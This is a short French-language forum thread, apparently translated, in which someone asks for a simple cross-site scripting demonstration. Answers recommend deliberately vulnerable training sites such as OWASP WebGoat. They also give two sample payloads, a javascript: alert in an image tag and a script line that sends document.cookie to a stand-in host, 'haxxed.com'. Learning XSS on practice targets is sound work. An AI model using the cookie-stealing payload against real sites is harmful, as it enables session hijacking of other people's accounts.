Quelqu'un peut-il me montrer une attaque Cross-site scripting en vigueur sur mon navigateur? Y a-t-il un exemple sur Internet qui fait cela? Je ne l'ai pas trouvé sur Internet.
Plus l'exemple est simple, mieux c'est.
Voir http://www.insecurelabs.org et http://www.insecurelabs.org/task/
Vulnérabilité intentionnelle à XSS dans le champ de recherche et plusieurs autres endroits.
Vous devrez généralement installer votre propre logiciel côté serveur pour un exemple XSS en direct. Peu de sites légitimes ouvriront intentionnellement une faille XSS aux internautes.
Un WebGoat prêt à l'emploi qui vous permet de démontrer XSS (entre autres) à vous-même est le WebGoat d'OWASP. Voici instructions pour installer WebGoat et démontrer XSS . Vous trouverez des exemples supplémentaires d'extraits de programme qui activent XSS dans l'article OWASP " Cross-site scripting (XSS) ".
<img src="javascript:alert('hello everybody')"></img>
La balise d'image que j'ai insérée est un exemple de xss. le src ci-dessus contient le script Java vous alertant.
Le formulaire simple serait également: si la boîte de message apparaît, vous savez, que la page ou le serveur est vulnérable.
<script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
Un excellent exemple du fonctionnement de la technique peut être trouvé ici https://www.hacksplaining.com/exercises/xss-stored